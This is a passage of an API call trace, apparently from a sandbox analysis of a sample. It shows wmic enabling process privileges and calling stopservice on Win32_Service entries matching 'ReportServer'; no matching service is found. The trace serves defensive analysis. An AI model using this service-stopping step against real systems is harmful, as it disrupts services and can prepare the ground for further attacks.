ppQualSet=0x1ad158*=0x1dc13b0) returned 0x0 [0245.266] malloc (_Size=0x18) returned 0xecbe0 [0245.266] IWbemQualifierSet:Get (in: This=0x1dc13b0, wszName="Implemented", lFlags=0, pVal=0x1ad168*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d4126de6568, varVal2=0xff4444fb), plFlavor=0x0 | out: pVal=0x1ad168*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d4126de6568, varVal2=0xff4444fb), plFlavor=0x0) returned 0x80041002 [0245.266] free (_Block=0xecbe0) [0245.266] malloc (_Size=0x18) returned 0xecbe0 [0245.266] malloc (_Size=0x18) returned 0xecbc0 [0245.266] IWbemQualifierSet:Get (in: This=0x1dc13b0, wszName="Description", lFlags=0, pVal=0x1ad180*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff4a2948, varVal2=0x730), plFlavor=0x0 | out: pVal=0x1ad180*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x730), plFlavor=0x0) returned 0x0 [0245.266] free (_Block=0xecbc0) [0245.266] malloc (_Size=0x18) returned 0xecbc0 [0245.266] IUnknown:Release (This=0x1dc13b0) returned 0x0 [0245.266] malloc (_Size=0x70) returned 0xed130 [0245.266] malloc (_Size=0x70) returned 0xed2f0 [0245.266] malloc (_Size=0x48) returned 0xed1b0 [0245.266] malloc (_Size=0x18) returned 0xecc20 [0245.266] malloc (_Size=0x70) returned 0xed370 [0245.266] malloc (_Size=0x70) returned 0xed3f0 [0245.266] malloc (_Size=0x48) returned 0xed470 [0245.266] malloc (_Size=0x50) returned 0xed4c0 [0245.266] malloc (_Size=0x70) returned 0xed520 [0245.267] malloc (_Size=0x70) returned 0xed5a0 [0245.267] malloc (_Size=0x48) returned 0xed620 [0245.267] free (_Block=0xed470) [0245.267] free (_Block=0xed3f0) [0245.267] free (_Block=0xed370) [0245.267] free (_Block=0xed1b0) [0245.267] free (_Block=0xed2f0) [0245.267] free (_Block=0xed130) [0245.267] IUnknown:Release (This=0x1dfc4a0) returned 0x0 [0245.267] free (_Block=0xed2a0) [0245.267] free (_Block=0xed220) [0245.267] free (_Block=0xed0b0) [0245.267] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*="PauseService", ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x1dfc4a0) returned 0x0 [0245.267] lstrlenW (lpString="PauseService") returned 12 [0245.267] lstrlenW (lpString="stopservice") returned 11 [0245.267] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0245.267] IUnknown:Release (This=0x1dfc4a0) returned 0x0 [0245.267] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*="ResumeService", ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x1dfc4a0) returned 0x0 [0245.267] lstrlenW (lpString="ResumeService") returned 13 [0245.267] lstrlenW (lpString="stopservice") returned 11 [0245.267] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0245.267] IUnknown:Release (This=0x1dfc4a0) returned 0x0 [0245.267] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*="InterrogateService", ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x1dfc4a0) returned 0x0 [0245.267] lstrlenW (lpString="InterrogateService") returned 18 [0245.267] lstrlenW (lpString="stopservice") returned 11 [0245.267] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0245.268] IUnknown:Release (This=0x1dfc4a0) returned 0x0 [0245.268] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*="UserControlService", ppInSignature=0x1ad220*=0x1dfc520, ppOutSignature=0x1ad228*=0x1dfca20) returned 0x0 [0245.268] lstrlenW (lpString="UserControlService") returned 18 [0245.268] lstrlenW (lpString="stopservice") returned 11 [0245.268] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0245.268] IUnknown:Release (This=0x1dfc520) returned 0x0 [0245.268] IUnknown:Release (This=0x1dfca20) returned 0x0 [0245.268] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*="Create", ppInSignature=0x1ad220*=0x1dfe470, ppOutSignature=0x1ad228*=0x1dfe970) returned 0x0 [0245.268] lstrlenW (lpString="Create") returned 6 [0245.268] lstrlenW (lpString="stopservice") returned 11 [0245.268] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0245.268] IUnknown:Release (This=0x1dfe470) returned 0x0 [0245.268] IUnknown:Release (This=0x1dfe970) returned 0x0 [0245.269] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*="Change", ppInSignature=0x1ad220*=0x1dfe1f0, ppOutSignature=0x1ad228*=0x1dfe6f0) returned 0x0 [0245.269] lstrlenW (lpString="Change") returned 6 [0245.269] lstrlenW (lpString="stopservice") returned 11 [0245.269] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0245.269] IUnknown:Release (This=0x1dfe1f0) returned 0x0 [0245.269] IUnknown:Release (This=0x1dfe6f0) returned 0x0 [0245.269] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*="ChangeStartMode", ppInSignature=0x1ad220*=0x1dfc610, ppOutSignature=0x1ad228*=0x1dfcb10) returned 0x0 [0245.269] lstrlenW (lpString="ChangeStartMode") returned 15 [0245.269] lstrlenW (lpString="stopservice") returned 11 [0245.269] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0245.269] IUnknown:Release (This=0x1dfc610) returned 0x0 [0245.269] IUnknown:Release (This=0x1dfcb10) returned 0x0 [0245.269] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*="Delete", ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x1dfc4a0) returned 0x0 [0245.269] lstrlenW (lpString="Delete") returned 6 [0245.269] lstrlenW (lpString="stopservice") returned 11 [0245.269] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0245.269] IUnknown:Release (This=0x1dfc4a0) returned 0x0 [0245.269] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*="GetSecurityDescriptor", ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x1dfc640) returned 0x0 [0245.269] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0245.269] lstrlenW (lpString="stopservice") returned 11 [0245.269] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0245.269] IUnknown:Release (This=0x1dfc640) returned 0x0 [0245.270] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*="SetSecurityDescriptor", ppInSignature=0x1ad220*=0x1dfc520, ppOutSignature=0x1ad228*=0x1dfca20) returned 0x0 [0245.270] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0245.270] lstrlenW (lpString="stopservice") returned 11 [0245.270] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0245.270] IUnknown:Release (This=0x1dfc520) returned 0x0 [0245.270] IUnknown:Release (This=0x1dfca20) returned 0x0 [0245.270] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0) returned 0x40005 [0245.270] IUnknown:Release (This=0x1dfbfa0) returned 0x0 [0245.270] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0245.270] lstrlenW (lpString="SET") returned 3 [0245.270] lstrlenW (lpString="call") returned 4 [0245.270] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0245.270] lstrlenW (lpString="CREATE") returned 6 [0245.270] lstrlenW (lpString="call") returned 4 [0245.270] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0245.270] free (_Block=0xe8600) [0245.270] malloc (_Size=0x8) returned 0xecff0 [0245.270] lstrlenW (lpString="GET") returned 3 [0245.270] lstrlenW (lpString="call") returned 4 [0245.270] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0245.270] lstrlenW (lpString="LIST") returned 4 [0245.270] lstrlenW (lpString="call") returned 4 [0245.270] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0245.270] lstrlenW (lpString="ASSOC") returned 5 [0245.270] lstrlenW (lpString="call") returned 4 [0245.270] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0245.271] WbemLocator:IUnknown:AddRef (This=0x1dc1390) returned 0x3 [0245.271] free (_Block=0xe6a90) [0245.271] lstrlenW (lpString="") returned 0 [0245.271] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.271] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0245.271] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.271] malloc (_Size=0x14) returned 0xecc40 [0245.271] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.271] GetCurrentThreadId () returned 0x730 [0245.271] GetCurrentProcess () returned 0xffffffffffffffff [0245.271] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1af560 | out: TokenHandle=0x1af560*=0x298) returned 1 [0245.271] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1af558 | out: TokenInformation=0x0, ReturnLength=0x1af558) returned 0 [0245.271] malloc (_Size=0x118) returned 0xed0b0 [0245.271] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0xed0b0, TokenInformationLength=0x118, ReturnLength=0x1af558 | out: TokenInformation=0xed0b0, ReturnLength=0x1af558) returned 1 [0245.271] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0xed0b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1707016669, Attributes=0x41ad), (Luid.LowPart=0x0, Luid.HighPart=946176, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=33554434, Attributes=0x41ba), (Luid.LowPart=0x0, Luid.HighPart=917848, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x100041b0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0245.271] free (_Block=0xed0b0) [0245.271] CloseHandle (hObject=0x298) returned 1 [0245.271] lstrlenW (lpString="GET") returned 3 [0245.271] lstrlenW (lpString="call") returned 4 [0245.271] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0245.271] lstrlenW (lpString="LIST") returned 4 [0245.271] lstrlenW (lpString="call") returned 4 [0245.271] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0245.271] lstrlenW (lpString="SET") returned 3 [0245.272] lstrlenW (lpString="call") returned 4 [0245.272] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0245.272] lstrlenW (lpString="CALL") returned 4 [0245.272] lstrlenW (lpString="call") returned 4 [0245.272] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0245.272] ??0CHString@@QEAA@XZ () returned 0x1af510 [0245.272] GetCurrentThreadId () returned 0x730 [0245.272] malloc (_Size=0x18) returned 0xecc60 [0245.272] malloc (_Size=0x18) returned 0xecc80 [0245.272] malloc (_Size=0x18) returned 0xecca0 [0245.272] malloc (_Size=0x18) returned 0xeccc0 [0245.272] malloc (_Size=0x18) returned 0xecce0 [0245.272] SysStringLen (param_1="\\\\") returned 0x2 [0245.272] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0245.272] malloc (_Size=0x18) returned 0xecd00 [0245.272] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0245.272] SysStringLen (param_1="\\") returned 0x1 [0245.273] malloc (_Size=0x18) returned 0xed6a0 [0245.273] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0245.273] SysStringLen (param_1="root\\cimv2") returned 0xa [0245.273] free (_Block=0xecd00) [0245.273] free (_Block=0xecce0) [0245.273] free (_Block=0xeccc0) [0245.273] free (_Block=0xecca0) [0245.273] free (_Block=0xecc80) [0245.273] free (_Block=0xecc60) [0245.273] malloc (_Size=0x18) returned 0xecc60 [0245.273] malloc (_Size=0x18) returned 0xecc80 [0245.273] malloc (_Size=0x18) returned 0xecca0 [0245.273] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1dc1390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4a29d0 | out: ppNamespace=0xff4a29d0*=0x1dd3b28) returned 0x0 [0245.279] free (_Block=0xecca0) [0245.279] free (_Block=0xecc80) [0245.279] free (_Block=0xecc60) [0245.279] CoSetProxyBlanket (pProxy=0x1dd3b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0245.279] free (_Block=0xed6a0) [0245.280] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0245.280] ??0CHString@@QEAA@XZ () returned 0x1af2b8 [0245.280] GetCurrentThreadId () returned 0x730 [0245.280] malloc (_Size=0x70) returned 0xed0b0 [0245.280] malloc (_Size=0x50) returned 0xed130 [0245.280] malloc (_Size=0x50) returned 0xed190 [0245.280] malloc (_Size=0x70) returned 0xed1f0 [0245.280] malloc (_Size=0x70) returned 0xed270 [0245.280] malloc (_Size=0x48) returned 0xed2f0 [0245.280] malloc (_Size=0x18) returned 0xecc60 [0245.280] lstrlenA (lpString="") returned 0 [0245.280] malloc (_Size=0x2) returned 0xe6a90 [0245.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff43314c, cbMultiByte=-1, lpWideCharStr=0xe6a90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0245.280] free (_Block=0xe6a90) [0245.280] malloc (_Size=0x70) returned 0xed340 [0245.280] malloc (_Size=0x48) returned 0xed3c0 [0245.280] malloc (_Size=0x18) returned 0xecc80 [0245.280] free (_Block=0xecc60) [0245.280] IWbemServices:GetObject (in: This=0x1dd3b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x1af2e8*=0x0, ppCallResult=0x0 | out: ppObject=0x1af2e8*=0x1dfc030, ppCallResult=0x0) returned 0x0 [0245.297] malloc (_Size=0x18) returned 0xecc60 [0245.297] IWbemClassObject:GetMethod (in: This=0x1dfc030, wszName="stopservice", lFlags=0, ppInSignature=0x1af2e0, ppOutSignature=0x1af2f8 | out: ppInSignature=0x1af2e0*=0x0, ppOutSignature=0x1af2f8*=0x1dfc530) returned 0x0 [0245.298] free (_Block=0xecc60) [0245.298] IUnknown:Release (This=0x1dfc530) returned 0x0 [0245.298] IUnknown:Release (This=0x1dfc030) returned 0x0 [0245.298] ??0CHString@@QEAA@XZ () returned 0x1af100 [0245.298] GetCurrentThreadId () returned 0x730 [0245.298] malloc (_Size=0x18) returned 0xecc60 [0245.298] lstrlenA (lpString="") returned 0 [0245.298] malloc (_Size=0x2) returned 0xe6a90 [0245.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff43314c, cbMultiByte=-1, lpWideCharStr=0xe6a90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0245.298] free (_Block=0xe6a90) [0245.298] malloc (_Size=0x18) returned 0xecca0 [0245.298] lstrlenA (lpString="") returned 0 [0245.298] malloc (_Size=0x2) returned 0xe6a90 [0245.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff43314c, cbMultiByte=-1, lpWideCharStr=0xe6a90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0245.298] free (_Block=0xe6a90) [0245.298] malloc (_Size=0x18) returned 0xeccc0 [0245.298] free (_Block=0xecca0) [0245.298] malloc (_Size=0x18) returned 0xecca0 [0245.298] lstrlenA (lpString="SELECT * FROM ") returned 14 [0245.298] malloc (_Size=0x1e) returned 0xed410 [0245.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff434a40, cbMultiByte=-1, lpWideCharStr=0xed410, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0245.299] free (_Block=0xed410) [0245.299] malloc (_Size=0x18) returned 0xecce0 [0245.299] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0245.299] SysStringLen (param_1="Win32_Service") returned 0xd [0245.299] free (_Block=0xecca0) [0245.299] malloc (_Size=0x18) returned 0xecca0 [0245.299] malloc (_Size=0x18) returned 0xecd00 [0245.299] lstrlenA (lpString=" WHERE ") returned 7 [0245.299] malloc (_Size=0x10) returned 0xed6a0 [0245.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff433e20, cbMultiByte=-1, lpWideCharStr=0xed6a0, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0245.299] free (_Block=0xed6a0) [0245.299] malloc (_Size=0x18) returned 0xed6a0 [0245.299] SysStringLen (param_1=" WHERE ") returned 0x7 [0245.299] SysStringLen (param_1="name like '%%ReportServer%%'") returned 0x1c [0245.299] malloc (_Size=0x18) returned 0xed6c0 [0245.299] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0245.299] SysStringLen (param_1=" WHERE name like '%%ReportServer%%'") returned 0x23 [0245.299] free (_Block=0xecce0) [0245.300] free (_Block=0xed6a0) [0245.300] free (_Block=0xecd00) [0245.300] free (_Block=0xecca0) [0245.300] malloc (_Size=0x18) returned 0xecca0 [0245.300] IWbemServices:ExecQuery (in: This=0x1dd3b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%ReportServer%%'", lFlags=48, pCtx=0x0, ppEnum=0x1af0e8 | out: ppEnum=0x1af0e8*=0x1dd3c28) returned 0x0 [0245.307] free (_Block=0xecca0) [0245.307] CoSetProxyBlanket (pProxy=0x1dd3c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0245.309] IEnumWbemClassObject:Next (in: This=0x1dd3c28, lTimeout=-1, uCount=0x1, apObjects=0x1af0f0, puReturned=0x1af278 | out: apObjects=0x1af0f0*=0x0, puReturned=0x1af278*=0x0) returned 0x1 [0245.642] IUnknown:Release (This=0x1dd3c28) returned 0x0 [0245.644] free (_Block=0xed6c0) [0245.644] free (_Block=0xeccc0) [0245.644] free (_Block=0xecc60) [0245.644] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0245.644] free (_Block=0xecc80) [0245.644] free (_Block=0xed2f0) [0245.644] free (_Block=0xed270) [0245.644] free (_Block=0xed1f0) [0245.644] free (_Block=0xed190) [0245.644] free (_Block=0xed130) [0245.644] free (_Block=0xed3c0) [0245.644] free (_Block=0xed340) [0245.644] free (_Block=0xed0b0) [0245.644] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0245.644] GetCurrentThreadId () returned 0x730 [0245.644] ??0CHString@@QEAA@PEBG@Z () returned 0x1af608 [0245.645] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1af608 [0245.645] malloc (_Size=0x800) returned 0xede70 [0245.645] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0xede70, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0245.645] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0245.645] malloc (_Size=0x1c) returned 0xed0b0 [0245.645] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0xed0b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0245.645] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0245.645] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0245.645] free (_Block=0xed0b0) [0245.645] free (_Block=0xede70) [0245.645] ??1CHString@@QEAA@XZ () returned 0x4abf0101 [0245.646] WbemLocator:IUnknown:Release (This=0x1dd3b28) returned 0x0 [0245.646] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0245.646] _kbhit () returned 0x0 [0245.647] free (_Block=0xecff0) [0245.647] free (_Block=0xecac0) [0245.647] free (_Block=0xecaa0) [0245.647] free (_Block=0xeca80) [0245.647] free (_Block=0xeca60) [0245.647] free (_Block=0xece20) [0245.647] free (_Block=0xecfc0) [0245.647] free (_Block=0xecf60) [0245.647] free (_Block=0xed060) [0245.647] free (_Block=0xecb60) [0245.647] free (_Block=0xecb80) [0245.647] free (_Block=0xe6ee0) [0245.647] free (_Block=0xed620) [0245.648] free (_Block=0xecba0) [0245.648] free (_Block=0xecc00) [0245.648] free (_Block=0xed5a0) [0245.648] free (_Block=0xed520) [0245.648] free (_Block=0xecbe0) [0245.648] free (_Block=0xecbc0) [0245.648] free (_Block=0xecc20) [0245.648] free (_Block=0xed4c0) [0245.648] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0245.648] free (_Block=0xecec0) [0245.648] free (_Block=0xecb00) [0245.648] free (_Block=0xecf90) [0245.648] free (_Block=0xecb40) [0245.648] free (_Block=0xed010) [0245.648] free (_Block=0xecb20) [0245.648] free (_Block=0xecae0) [0245.648] free (_Block=0xe69a0) [0245.648] free (_Block=0xe69f0) [0245.649] free (_Block=0xe6a40) [0245.649] free (_Block=0xecc40) [0245.649] free (_Block=0xe6b00) [0245.649] free (_Block=0xe6ec0) [0245.649] free (_Block=0xe8040) [0245.649] free (_Block=0xe6ea0) [0245.649] free (_Block=0xe8000) [0245.649] free (_Block=0xe6e40) [0245.649] free (_Block=0xe6e60) [0245.649] free (_Block=0xe6d20) [0245.649] free (_Block=0xe6d40) [0245.649] free (_Block=0xe6cc0) [0245.649] free (_Block=0xe6ce0) [0245.649] free (_Block=0xe6d80) [0245.649] free (_Block=0xe6da0) [0245.649] free (_Block=0xe6de0) [0245.649] free (_Block=0xe6e00) [0245.649] free (_Block=0xe6c00) [0245.649] free (_Block=0xe6c20) [0245.649] free (_Block=0xe6ba0) [0245.649] free (_Block=0xe6bc0) [0245.649] free (_Block=0xe6c60) [0245.650] free (_Block=0xe6c80) [0245.650] free (_Block=0xe6b40) [0245.650] free (_Block=0xe6b60) [0245.650] free (_Block=0xe6ab0) [0245.650] free (_Block=0xe7f90) [0245.650] free (_Block=0xe6f70) [0245.650] WbemLocator:IUnknown:Release (This=0x1dc1390) returned 0x2 [0245.650] WbemLocator:IUnknown:Release (This=0x1dd3a98) returned 0x0 [0245.650] WbemLocator:IUnknown:Release (This=0x1dc1390) returned 0x1 [0245.650] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0245.650] WbemLocator:IUnknown:Release (This=0x1dc1390) returned 0x0 [0245.650] free (_Block=0xec9e0) [0245.650] free (_Block=0xeca00) [0245.651] free (_Block=0xe8540) [0245.651] free (_Block=0xeca20) [0245.651] free (_Block=0xeca40) [0245.651] free (_Block=0xe8580) [0245.651] free (_Block=0xec860) [0245.651] free (_Block=0xec880) [0245.651] free (_Block=0xe83c0) [0245.651] free (_Block=0xec8a0) [0245.651] free (_Block=0xec8c0) [0245.651] free (_Block=0xe8400) [0245.651] free (_Block=0xec7e0) [0245.651] free (_Block=0xec800) [0245.651] free (_Block=0xe8340) [0245.651] free (_Block=0xec820) [0245.651] free (_Block=0xec840) [0245.651] free (_Block=0xe8380) [0245.651] free (_Block=0xec960) [0245.651] free (_Block=0xec980) [0245.651] free (_Block=0xe84c0) [0245.651] free (_Block=0xec9a0) [0245.651] 